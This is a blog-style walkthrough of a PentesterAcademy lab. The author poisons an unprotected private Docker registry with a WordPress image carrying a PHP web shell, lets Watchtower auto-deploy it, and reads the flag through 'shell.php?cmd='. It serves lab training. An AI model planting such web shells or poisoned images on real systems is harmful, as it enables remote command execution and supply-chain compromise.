Where Notes Work
Corrupting Source Image – Docker
Hello Friends, In this post, I’ll share with you, how I solve PentesterAcademy Corrupting Source Image Docker Lab.
Scenario: The target docker server is running a webserver image that is serving on port 80. The docker image used for the webserver is stored on the unprotected private docker registry present on the same network. A watchtower instance deployed on the target server ensures that the latest image present in the private repository is used for the webserver container. A flag is mounted from the host machine into /tmp directory of the webserver container.
In the /etc/hosts file there is targetserver and registry address, registry:5000 is the address where all images are stored.
By doing, curl to targetserver on port 80, it reveals that it running a WordPress website.
if we check for available images in the registry, we found that there are 4 images including WordPress.
Let’s pull the WordPress image from registry:5000
after that, we will run this image in detached mode, and after that in interactive mode.
now, if we see in /tmp folder, we didn’t find that flag, for that, we can create a new modified WordPress docker image and add a web shell to it.
Creating a shell.php, Dockerfil, and building it.
root@localhost# vim shell.php
<?php
$result=shell_exec($_GET["cmd"]);
echo $result;
?>
root@localhost# vim Dockerfile
FROM registry:5000/wordress
COPY shell.php /app/
RUN chmod 777 /app
Now, our web shell is added to the new WordPress image, now we will wait for some time for the watchtower to auto-deploy our image, after 2-3 minutes if we curl to targetserver with id command we can see the reply coming.
root@localhost# curl "targetserver/shell.php?cmd=id"
now if we do ls to /tmp, we can see that, there is a flag.
If you face any problems with this challenge, let me know in the comment section.